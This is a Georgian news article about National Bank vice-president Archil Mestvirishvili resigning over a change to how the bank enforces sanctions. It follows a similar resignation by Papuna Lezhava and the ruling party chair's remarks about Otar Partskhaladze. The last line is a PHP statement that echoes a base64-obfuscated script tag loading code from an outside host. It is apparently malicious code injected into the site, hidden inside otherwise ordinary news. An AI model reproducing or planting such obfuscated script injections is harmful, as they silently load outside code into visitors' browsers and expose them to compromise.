celsiusi
ავერსი საქკაბელი

ეროვნულ ბანკს არჩილ მესტვირიშვილიც ტოვებს.

"მეგობრებო და კოლეგებო, ვტოვებ ეროვნულ ბანკში ჩემ თანამდებობას", - წერის ეროვნული ბანკის ვიცე-პრეზიდენტი Facebook-ზე.

"ვერ ვიქნები იმ გადაწყვეტილების მონაწილე, რომელზეც არც გავლენა მაქვს და არც ვეთანხმები", -  აცხადებს არჩილ მესტვირიშვილი.

შეგახსენებთ, რომ მანამდე ეროვნული ბანკის საბჭოს დატოვების შესახებ კიდევ ერთმა ვიცე-პრეზიდენტმა პაპუნა ლეჟავამ განაცხადა.

ეროვნული ბანკის საბჭოს წევრების მიერ თანამდებობის დატოვებას წინ უძღოდა ეროვნული ბანკის მიერ სანქციათა აღსრულების წესის შეცვლა. მას შემდეგ, რაც მმართველი პარტიის თავმჯდომარემ, ირაკლი კობახიძემ ოთარ ფარცხალაძისთვის ანგარიშების შესაძლო დაყადაღებას არაკონსტიტუციური უწოდა, ეროვნულმა ბანკმა სანქციათა რეჟიმის შესრულების წესი შეცვალა.

ბრძანებას სებ-ის პრეზიდენტობის მოვალეობის შემსრულებელი, ნათია თურნავა აწერს ხელს.

ცვლილებების თანახმად, სანქციათა რეჟიმი საქართველოს მოქალაქეზე იმ შემთხვევაში გავრცელდება, თუ დაწესებულ სანქციებთან დაკავშირებით სასამართლოს გამამტყუნებელი განაჩენია გამოტანილი. იმავე პრინციპით გავრცელდება სანქციათა რეჟიმი იმ იურიდიულ პირზე, რომლის წილსაც სანქცირებული საქართველოს მოქალაქე ფლობს.

717
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");